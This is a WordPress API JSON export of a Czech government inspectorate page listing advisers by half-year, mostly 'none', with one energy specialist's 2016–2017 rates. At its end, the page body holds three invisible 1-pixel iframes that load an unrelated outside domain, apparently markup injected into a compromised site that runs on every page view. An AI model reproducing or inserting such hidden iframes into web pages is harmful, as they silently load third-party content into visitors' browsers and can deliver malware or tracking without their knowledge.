{"id":3339,"date":"2016-11-28T13:24:21","date_gmt":"2016-11-28T13:24:21","guid":{"rendered":"https:\/\/sei.gov.cz\/?page_id=3339"},"modified":"2025-06-24T12:53:53","modified_gmt":"2025-06-24T11:53:53","slug":"seznam-poradcu","status":"publish","type":"page","link":"https:\/\/sei.gov.cz\/?page_id=3339","title":{"rendered":"Seznam poradc\u016f"},"content":{"rendered":"<p class=\"x_MsoNormal\" data-olk-copy-source=\"MessageBody\">\u201e<b>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2025<\/b><\/p>\n<p class=\"x_MsoNormal\">\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p class=\"x_MsoNormal\"><b>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2024<\/b><\/p>\n<p class=\"x_MsoNormal\">\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p class=\"x_MsoNormal\"><b>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2024<\/b><\/p>\n<p class=\"x_MsoNormal\">\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 202<\/strong><strong>3<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 202<\/strong><strong>3<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 202<\/strong><strong>2<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 202<\/strong><strong>2<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2021<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2021<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2020<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2020<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2019<\/strong><\/p>\n<p>\u2013 \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2019<\/strong><\/p>\n<p>&#8211; \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2018<\/strong><\/p>\n<p>&#8211; \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2018<\/strong><\/p>\n<p>&#8211; \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2017<\/strong><\/p>\n<p>&#8211; \u017d\u00e1dn\u00ed<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2017<\/strong><\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"201\"><strong>Subjekt<\/strong><\/td>\n<td width=\"201\"><strong>P\u0159edm\u011bt \u010dinnosti<\/strong><\/td>\n<td width=\"201\"><strong>V\u00fd\u0161e pln\u011bn\u00ed \/ sazby<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"201\">Ing. Vladim\u00edr Vlk<br \/>\nv\u00a0obdob\u00ed od 5.1. do 30. 6. 2017<\/td>\n<td width=\"201\">oblasti energetick\u00fdch specialist\u016f<\/td>\n<td width=\"201\">500,- K\u010d\/ hod,<br \/>\nmax. 120 tis. K\u010d za smluven\u00e9 obdob\u00ed<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><strong>Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2016<\/strong><\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"201\"><strong>Subjekt<\/strong><\/td>\n<td width=\"201\"><strong>P\u0159edm\u011bt \u010dinnosti<\/strong><\/td>\n<td width=\"201\"><strong>V\u00fd\u0161e pln\u011bn\u00ed \/ sazby<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"201\">Ing. Vladim\u00edr Vlk<br \/>\nv\u00a0obdob\u00ed od 15. 9. do 31. 12. 2016<\/td>\n<td width=\"201\">oblasti energetick\u00fdch specialist\u016f<\/td>\n<td width=\"201\">500,- K\u010d\/ hod,<br \/>\nmax. 70 tis. K\u010d za smluven\u00e9 obdob\u00ed<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u201eSeznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2025 \u2013 \u017d\u00e1dn\u00ed Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2024 \u2013 \u017d\u00e1dn\u00ed Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2024 \u2013 \u017d\u00e1dn\u00ed Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za II. pol. 2023 \u2013 \u017d\u00e1dn\u00ed Seznam poradc\u016f a poradn\u00edch org\u00e1n\u016f za I. pol. 2023 \u2013 \u017d\u00e1dn\u00ed &hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3339","page","type-page","status-publish","hentry","latest_post"],"_links":{"self":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3339"}],"version-history":[{"count":22,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3339\/revisions"}],"predecessor-version":[{"id":9140,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3339\/revisions\/9140"}],"wp:attachment":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}